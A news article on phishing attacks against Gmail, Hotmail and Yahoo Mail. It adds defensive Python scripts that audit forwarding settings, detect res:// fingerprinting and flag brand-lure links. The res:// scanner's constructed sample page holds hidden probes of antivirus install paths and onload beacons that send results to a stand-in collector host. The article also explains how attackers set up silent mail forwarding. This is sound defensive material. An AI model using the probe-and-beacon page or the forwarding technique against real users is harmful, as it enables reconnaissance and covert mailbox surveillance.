Google recently revealed the details of a successful phishing attack that compromised several high-profile users on its Gmail service. Yahoo Mail and Hotmail users are also under attack, said Trend Micro.
Days after Google disclosed that several high-profile Gmail accounts had been hit by a phishing campaign, reports have emerged of similar attacks against other Web-based email providers.
Hotmail and Yahoo Mail have also been targeted with similar phishing attacks, Nart Villeneuve, a senior threat researcher at Trend Micro, wrote in a June 2 blog post. Villeneuve believed the attacks were conducted separately.
As in the assault on Gmail, the perpetrators were trying to gain control of user accounts on other Web mail services in order to monitor communications. Some of the attacks also had a second objective: to find out what security software was installed on the user's system, information that would help the attackers plan future assaults, according to Villeneuve.
"There have been a variety of recent attacks on popular Web mail platforms. In addition to Gmail, Hotmail and Yahoo! Mail have also been targeted," Villeneuve wrote on the Trend Micro blog.
The initial phase appears to be a targeted email that redirected users to a fake site designed to trick them into entering their log-in credentials. With the credentials in hand, the attacker can log in to the account and change settings that let them monitor the account's mail from then on. The Gmail attackers entered an email address they control under the account's forwarding and delegation settings, which lets them receive copies of incoming messages and read and send mail from the account without ever having to log back into it. Hotmail keeps the equivalent feature under "Email forwarding" in Options. Only users who have upgraded to Yahoo Mail Plus have the option to forward their messages to another address.
This is why, when users learn their accounts have been hacked, it is not enough to reset the password. They should also check that the attackers have not set up forwarding to rogue email addresses or granted themselves delegated access, because those settings survive a password change.
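The following Python script is an added worked example, not code from Trend Micro, Google or the article's author. It audits a snapshot of an account's mail-routing settings for exactly the backdoors described above: auto-forwarding, extra forwarding addresses, filters that forward or hide mail, and delegates. The snapshot layout is modelled on the Gmail API settings resources (autoForwarding, forwardingAddresses, filters, delegates); the addresses and filters in it are constructed, and TRUSTED_DOMAINS is an assumed allowlist you would replace with your own domains.

```python
"""Audit a webmail account's mail-routing settings for a silent-forwarding backdoor.

Added example, not Trend Micro's or Google's code. The snapshot layout is
modelled on the Gmail API settings resources; the data in it is constructed.
"""
from dataclasses import dataclass

# Assumption: domains the account owner may legitimately forward or delegate to.
TRUSTED_DOMAINS = {"example.com"}

# Constructed snapshot of a compromised account's settings (not real data).
SNAPSHOT = {
    "autoForwarding": {
        "enabled": True,
        "emailAddress": "backup.mailbox@attacker-mail.invalid",
        "disposition": "leaveInInbox",
    },
    "forwardingAddresses": [
        {"forwardingEmail": "archive@example.com", "verificationStatus": "accepted"},
        {"forwardingEmail": "backup.mailbox@attacker-mail.invalid", "verificationStatus": "accepted"},
    ],
    "filters": [
        {"id": "f1", "criteria": {"from": "hr@example.com"},
         "action": {"addLabelIds": ["Label_1"]}},
        {"id": "f2", "criteria": {"query": "password OR \"security alert\""},
         "action": {"forward": "backup.mailbox@attacker-mail.invalid",
                    "removeLabelIds": ["INBOX", "UNREAD"],
                    "addLabelIds": ["TRASH"]}},
    ],
    "delegates": [
        {"delegateEmail": "assistant@attacker-mail.invalid", "verificationStatus": "accepted"},
    ],
}


@dataclass(frozen=True)
class Finding:
    kind: str      # what was found
    target: str    # address or filter id involved
    severity: str  # "high" (points outside trusted domains / hides mail) or "info"


def domain_of(address):
    """Lower-cased domain part of an e-mail address."""
    return address.rsplit("@", 1)[-1].lower()


def audit_mail_routing(snapshot, trusted_domains):
    """Return every setting that routes or hides the account's mail."""
    trusted = {d.lower() for d in trusted_domains}
    findings = []

    def severity_for(address):
        return "high" if domain_of(address) not in trusted else "info"

    auto = snapshot.get("autoForwarding", {})
    if auto.get("enabled") and auto.get("emailAddress"):
        findings.append(Finding("auto_forwarding", auto["emailAddress"],
                                severity_for(auto["emailAddress"])))

    # Any verified forwarding address is a place mail can be copied to later.
    for entry in snapshot.get("forwardingAddresses", []):
        addr = entry["forwardingEmail"]
        findings.append(Finding("forwarding_address", addr, severity_for(addr)))

    for flt in snapshot.get("filters", []):
        action = flt.get("action", {})
        fid = flt.get("id", "?")
        if action.get("forward"):
            findings.append(Finding("filter_forward", f"{fid} -> {action['forward']}",
                                    severity_for(action["forward"])))
        # A filter that skips the inbox or trashes matches hides evidence of forwarding.
        removed = set(action.get("removeLabelIds", []))
        added = set(action.get("addLabelIds", []))
        if "INBOX" in removed or "TRASH" in added or "SPAM" in added:
            findings.append(Finding("filter_hides_mail", fid, "high"))

    # A delegate reads and sends from their own login; no password needed.
    for delegate in snapshot.get("delegates", []):
        addr = delegate["delegateEmail"]
        findings.append(Finding("delegate", addr, severity_for(addr)))

    return findings


if __name__ == "__main__":
    for f in audit_mail_routing(SNAPSHOT, TRUSTED_DOMAINS):
        print(f"[{f.severity}] {f.kind}: {f.target}")
```

Run against the constructed snapshot, the audit reports five high-severity findings (auto-forwarding, a foreign forwarding address, a filter that both forwards and trashes matching mail, and a foreign delegate) and one informational finding for the in-domain archive address. In practice you would feed it the live responses from the provider's settings API rather than the inline dictionary.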
The scam also involves running a script that exploited the res:// protocol to discover what antivirus software is running on the system the victim is using, which could be the victim's personal machine or even a public terminal in a university or library. The res:// protocol has been part of Internet Explorer since version 4.0 and can be used to access resources inside an executable (EXE) or library (DLL) file on the computer. Because a res:// request succeeds only if the named file exists, a page can reference the install paths of known security products and learn from which requests load which product is present, with no exploit required.
Malware that exploits the res:// protocol is used to craft customized attacks that "have a high probability of success," Villeneuve said. By relying on this two-pronged method, attackers can gain full control over the victim's PC, not just the Web mail account.
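The script below is an added example, not Trend Micro's code, for the detection side of this technique: it scans a captured page or HTML e-mail body for res:// references and separates local-file probes (absolute Windows paths, the fingerprinting pattern) from ordinary resource references such as the browser's own ieframe.dll icons. The page it scans is constructed, and the product directories in it are placeholder names, not real vendor paths.

```python
"""Find res:// probes that fingerprint installed software in a captured HTML page.

Added example, not Trend Micro's code. SAMPLE_PAGE is constructed; the
product directories in it are placeholders, not real vendor install paths.
"""
import re
from dataclasses import dataclass

# res://<module>[/<type>]/<id>; the module may be a bare DLL name or a full path.
RES_URI = re.compile(r"""res://([^"'<>)]+)""", re.IGNORECASE)
# Drive-letter or UNC path: the request names a specific file on the victim's disk.
ABS_PATH = re.compile(r"^(?:[A-Za-z]:\\|\\\\)")


@dataclass(frozen=True)
class ResProbe:
    uri: str          # the res:// URI as written in the page
    module: str       # file the resource would be loaded from
    local_file: bool  # True when the module is an absolute path on disk


def find_res_probes(html):
    """Extract every quoted res:// URI and classify its module."""
    probes = []
    for match in RES_URI.finditer(html):
        body = match.group(1).strip().replace("\\\\", "\\")  # undo JS string escaping
        module = body.split("/", 1)[0]                      # path part before the resource type
        probes.append(ResProbe("res://" + body, module, bool(ABS_PATH.match(module))))
    return probes


def looks_like_fingerprinting(probes, min_files=2):
    """Several distinct local files probed from one page is the recon pattern."""
    targets = {p.module.lower() for p in probes if p.local_file}
    return len(targets) >= min_files


# Constructed page in the style of the recon script described in the article.
SAMPLE_PAGE = r'''
<html><body>
<script>
function hit(n){ new Image().src = "http://collector.invalid/r?av=" + n; }
</script>
<img src="res://C:\Program Files\ExampleAV\scanner.exe/#2/#1" onload="hit('exampleav')" style="display:none">
<img src="res://C:\Program Files\Contoso Security\csmon.dll/#2/#1" onload="hit('contoso')" style="display:none">
<img src="res://C:\Program Files\Fabrikam Guard\fgui.exe/#2/#1" onload="hit('fabrikam')" style="display:none">
<a href="res://ieframe.dll/info_48.png">help</a>
</body></html>
'''

if __name__ == "__main__":
    found = find_res_probes(SAMPLE_PAGE)
    for p in found:
        print(("LOCAL " if p.local_file else "module") + "  " + p.module)
    print("fingerprinting:", looks_like_fingerprinting(found))
```

On the constructed page the scanner reports three local-file probes and one benign module reference, and flags the page as fingerprinting. The onload handlers are what turn a successful load into a beacon to the attacker; blocking res:// in mail clients and proxies, or simply not using Internet Explorer for webmail, removes the signal entirely.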
In addition to spear phishing, the attackers appeared to be looking at Web vulnerabilities to target political activists, Villeneuve said. The Gmail attack was similar to an earlier attack targeting Hotmail users in Taiwan, in which a malicious email masquerading as a message from the Facebook security team could take over the user's account simply by being previewed.
In another incident, adversaries tried to steal user cookies in order to access Yahoo Mail accounts without needing to crack users' log-in information or passwords. Trend Micro alerted Yahoo to the attack. "While this attempt appeared to fail, it does signify that attackers are attempting to attack Yahoo! Mail users as well," said Villeneuve.
The Yahoo Mail attackers were also behind a different spam campaign that featured malicious Microsoft Excel spreadsheets back in March, according to Trend Micro.
"These attacks can be difficult to defend against because these often appear to come from recognizable sources," Villeneuve said. There are some clues that can help identify phishing emails, such as spelling and grammatical errors.
In addition, while the malicious links may contain keywords like "google," "hotmail," or "yahoo," they actually point to third-party Websites, which can be spotted by checking the host the link really resolves to rather than the words in it. The use of two-step verification can also help defend against such attacks, since a stolen password alone is then not enough to log in.
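The following Python script is an added example, not code from the article or from Trend Micro, that turns the brand-keyword advice above into a check: for every link in a message body it asks whether the URL mentions a webmail brand and, if so, whether the link's actual host belongs to that brand. BRAND_DOMAINS is an assumed allowlist of each provider's real domains that you would adjust for your environment, and the e-mail body at the bottom is constructed.

```python
"""Flag links that mention a webmail brand but resolve to someone else's host.

Added example, not from the original article or Trend Micro. BRAND_DOMAINS is an
assumed allowlist; SAMPLE_MESSAGE is a constructed phishing body.
"""
import re
from urllib.parse import urlsplit

# Assumption: keyword -> domains the brand actually owns (extend for your environment).
BRAND_DOMAINS = {
    "google": ("google.com", "gmail.com"),
    "gmail": ("google.com", "gmail.com"),
    "hotmail": ("hotmail.com", "live.com"),
    "yahoo": ("yahoo.com",),
}

HREF = re.compile(r"""href\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def host_belongs_to(host, domain):
    """True only for the domain itself or a real subdomain, not a look-alike prefix."""
    return host == domain or host.endswith("." + domain)


def classify_link(url):
    """Return (verdict, host) where verdict is 'brand_host', 'brand_lure' or 'no_brand'."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    # .hostname discards userinfo, so "http://google.com@evil" is seen as host "evil".
    host = (parts.hostname or "").lower()
    mentioned = [brand for brand in BRAND_DOMAINS if brand in url.lower()]
    if not mentioned:
        return ("no_brand", host)
    for brand in mentioned:
        if any(host_belongs_to(host, d) for d in BRAND_DOMAINS[brand]):
            return ("brand_host", host)
    return ("brand_lure", host)


def lure_links(html):
    """(url, real host) for every href that names a brand but points elsewhere."""
    results = []
    for url in HREF.findall(html):
        verdict, host = classify_link(url)
        if verdict == "brand_lure":
            results.append((url, host))
    return results


# Constructed phishing body; the hosts use reserved/example addresses only.
SAMPLE_MESSAGE = """
<p>Your Gmail account will be suspended.
<a href="http://accounts.google.com.login-verify.invalid/ServiceLogin">Verify now</a></p>
<p>Or use <a href="http://google.com@203.0.113.9/verify">this link</a>.</p>
<p>Help: <a href="https://support.google.com/mail/">support.google.com</a></p>
<p>Unrelated: <a href="https://example.org/news">news</a></p>
"""

if __name__ == "__main__":
    for url, host in lure_links(SAMPLE_MESSAGE):
        print(f"lure: {url}  (really {host})")
```

The two lures in the constructed message are the classic shapes: a brand name used as a subdomain of an unrelated registered domain, and a brand name placed in the userinfo part before an @ so that the browser actually connects to the IP address after it. The genuine support.google.com link passes because the host check works from the right-hand end of the hostname, which is the only part an attacker cannot choose freely.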